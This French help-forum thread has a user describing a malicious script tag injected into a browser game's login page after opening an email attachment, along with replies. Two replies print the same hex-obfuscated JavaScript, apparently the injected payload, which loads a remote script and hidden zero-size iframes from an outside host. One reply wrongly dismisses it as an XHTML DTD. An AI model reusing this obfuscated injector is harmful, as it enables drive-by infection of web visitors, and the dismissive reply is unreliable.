Sujet Précédent Sujet Suivant

Code source incrusté<script src=http://ck1.in

Fermé
Tiphaine Coulon - 21 juil. 2007 à 23:32
 ?????? - 26 juin 2008 à 21:07
bonjour,

J'ai une utilisation du web du type nana qui s'amuse et ne fait pas trop de trucs bizarres sur le net.
Bref utilisation d'email, jeu non payants, sites banals d'information, msn mesenger et streaming sur les grands sites officiels comme tous les moutons. Avec ma configuration de logiciels toujours mis a jours, je n'ai jusqu'alors eu aucun probleme.

Concernant les jeux, je ne joue qu'à Tribal wars (un jeu de masse en ligne,par navigation de pages web, du genre Ogame ou bite fight) Rien de méchant

Et voila qu'un jour, je visite ma boite mail je telecharge une piece jointe (document excel pas lourd du tout avec des tableaux, des onglets et des graphiques simples) d'une connaissance (comme de tant en temps seulement).
Simple coincidence ou non : Le soir même, je n'arrive plus à accéder à mon jeu. Je met mon mot de passe et j'arrive sur une page vierge. Comme j'utilise le module complémentaire "nosript" de firefox 2, j'ai remarqué que quelque chose s'est imissé dans le code source de la page vierge et de la page d'accueil demandant l'identification.

c'est la ligne:
<script src=http://ck1.in/n.js>



Voici le début du code source de la page d'accueil:

<script src=http://ck1.in/n.js></script><?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tribal Wars</title> <link rel="stylesheet" type="text/css" href="stamm.css" /> <script type="text/javascript">


J'ai fait scanner le fichier excel telechargé par totalvirus et kaspersky online, et je ne trouve rien.


J'ai demandé à un ami d'aller sur la même page d'accueil www.tribalwars.fr à partir d'un autre ordi, et il me confirme qu'il voit en source la meme chose, sans le <script src=http://ck1.in/n.js>


Là je me dis que c'est un lien vers un truc louche, et qu'heuresement "noscript" ou un autre de mes logiciel a empeché à mon navigateur d'aller plus loin automatiquement.


J'ai tout scané mon pc, full scan, partout, en mode sans echec comme en mode normal,
avec ccleaner, ad-aware, spybot, avast, hijackthis, cwshredder, spywareblaster, tous à jours

Je ne vois rien du tout. Et le probleme persiste.
Alors je me mets à désactiver un à un les programes en tache de fond, et bizarrement, j'ai finanlement trouvé avec avast un trojan :
"Application: 1104
Description: Sign of "Win32:VB-AQA [Trj]" has been found in "C:\Program Files\Spybloquer Softfware\Pro\uclose.exe" file.

Bref, je met en quarantaine et supprime.

Ca ne marche pas, alors je re-scan, met en quanrantaine, supprime, et desactive le logiciel spyblocker pro. Et là miracle, j'arrive à me connecter sans page vierge.

Le problème c'est que je crains que le probleme ressurgisse un jour.
Que faire ?


egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????


Merci de votre aide
A voir également:

20 réponses

Réponse 1 / 20
Stéphan35 Messages postés 13 Date d'inscription vendredi 30 mars 2007 Statut Membre Dernière intervention 9 octobre 2008 15
28 août 2007 à 23:13
Bonsoir, je pasais par là ...

Grace à linux :

document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")


à mon avis, ça sent pas bon cette histoire .....
1
Réponse 2 / 20
Tiphaine Coulon
22 juil. 2007 à 07:53
Le problème est toujours là finalement.

Que pouvez-vous me recommander ?
0
Réponse 3 / 20
z
22 juil. 2007 à 17:33
Quelq'un pour répondre ?
0
Réponse 4 / 20
Frou
22 juil. 2007 à 22:45
beh moi j'vois rien ds le code source de ce que tu dis !
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Réponse 5 / 20
Tiphaine Coulon
22 juil. 2007 à 22:56
Ahhn voila une personne qui visite ce topic. Mais tu as mal lu mon message....


En résumé, ce code source s'est incrusté et ne devais pas être là.
Sa présence fait en sorte que je ne vois plus rien.
Il faudrait trouver un moyen de l'enlever.
J'ai tout scané, éliminé la moindre trace de trojan/malware, et toujouts aucune amélioration.


egalement, Y'a-t-il un moyen de vivre avec ce probleme : une technique permettant de filtrer automatiquement mes navigations en eliminant automatiquement toute présence de <script src=http://ck1.in/n.js> ????
0
Réponse 6 / 20
aa
24 juil. 2007 à 04:12
Personne ?
0
Réponse 7 / 20
aa
26 juil. 2007 à 04:40
toujours persone
0
Réponse 8 / 20
invité
29 juil. 2007 à 14:40
énième up jusqu'à ce qu'il y ait réponse
0
Réponse 9 / 20
coda
1 août 2007 à 11:50
up
0
Réponse 10 / 20
cisl
3 août 2007 à 00:05
up
0
Réponse 11 / 20
vodr
6 août 2007 à 13:25
up
0
Réponse 12 / 20
diap
12 août 2007 à 07:14
up
0
Réponse 13 / 20
prea
23 août 2007 à 02:34
up
0
Réponse 14 / 20
stephan32
28 août 2007 à 23:11
Bonsoir, je pasais par là ...

Grace à linux :

document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x4E\x45\x77\x4A\x73\x32\x2E\x6A\x73\"\x3E\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x7B");
document.writeln("\x76\x61\x72\x20\x54\x68\x65\x6E\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x20");
document.writeln("\x54\x68\x65\x6E\x2E\x73\x65\x74\x54\x69\x6D\x65\x28\x54\x68\x65\x6E\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x20\x2B\x20\x32\x34\x2A\x36\x30\x2A\x36\x30\x2A\x31\x30\x30\x30\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x20\x3D\x20\x6E\x65\x77\x20\x53\x74\x72\x69\x6E\x67\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x29");
document.writeln("\x76\x61\x72\x20\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\"\x20");
document.writeln("\x76\x61\x72\x20\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x3D\x20\x63\x6F\x6F\x6B\x69\x65\x53\x74\x72\x69\x6E\x67\x2E\x69\x6E\x64\x65\x78\x4F\x66\x28\x63\x6F\x6F\x6B\x69\x65\x48\x65\x61\x64\x65\x72\x29");
document.writeln("\x69\x66\x20\x28\x62\x65\x67\x69\x6E\x50\x6F\x73\x69\x74\x69\x6F\x6E\x20\x21\x3D\x20\x2D\x31\x29\x7B\x20");
document.writeln("\x7D\x20\x65\x6C\x73\x65\x20");
document.writeln("\x7B\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x20\x3D\x20\"\x43\x6F\x6F\x6B\x69\x65\x31\x3D\x50\x4F\x50\x57\x49\x4E\x44\x4F\x53\x3B\x65\x78\x70\x69\x72\x65\x73\x3D\"\x2B\x20\x54\x68\x65\x6E\x2E\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67\x28\x29\x20");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x68\x74\x6D\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\'\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x30\x20\x68\x65\x69\x67\x68\x74\x3D\x30\x20\x73\x72\x63\x3D\"\x68\x74\x74\x70\x3A\/\/\x6F\x72\x61\x2E\x33\x31\x36\x38\x61\x2E\x63\x6F\x6D\/\x73\x33\x36\x38\/\x74\x33\x36\x38\x2E\x67\x69\x66\"\x3E\x3C\/\x69\x66\x72\x61\x6D\x65\x3E\'\x29\x3B");
document.writeln("\x7D");
document.writeln("\x7D");
document.writeln("\x49\x73\x5F\x47\x6F\x47\x6F\x28\x29\x3B");
document.writeln("\x3C\/\x73\x63\x72\x69\x70\x74\x3E");
document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x3E\x77\x69\x6E\x64\x6F\x77\x2E\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x74\x72\x75\x65\x3B\x7D\x3C\/\x73\x63\x72\x69\x70\x74\x3E")
0
Réponse 15 / 20
prou
6 sept. 2007 à 23:46
Qu'est-ce que ça signifie ?
0
Réponse 16 / 20
Krad
26 déc. 2007 à 19:20
Il s'agit tout simplement de la dtd relative aux nouvelles normes xhtml en aucun cas il ne s'agit d'un virus ou spyware.
0
Réponse 17 / 20
jimsalut
8 mai 2008 à 22:11
tu as le code source de tribalwars?????
0
Réponse 18 / 20
kelkundebien
7 juin 2008 à 22:23
esseye de te connecté avec la page en cache de google
0
Réponse 19 / 20
Tiphaine Coulon
21 juil. 2007 à 23:39
Je rajoute que je n'ai rien trouvé sur google qui pourrait m'aider sur cette ligne bizarre en début de code source.

<script src=http://ck1.in/n.js> sur google me renvoie sur une minuscuele quinzaine de résulatats : des forums chinois (dans le sens premier du terme)

Bref, cette ligne bien particulière n'a jamais été traité par le anglophones
-1
Réponse 20 / 20
??????
26 juin 2008 à 21:07
vaut guelle
-1

Discussions similaires

192.168.49.1
4Pedro -
hopelan -

1 réponse
Code de renvoi d'appel : Ooredo, Mobilis...
midoou07 -
Camille -

13 réponses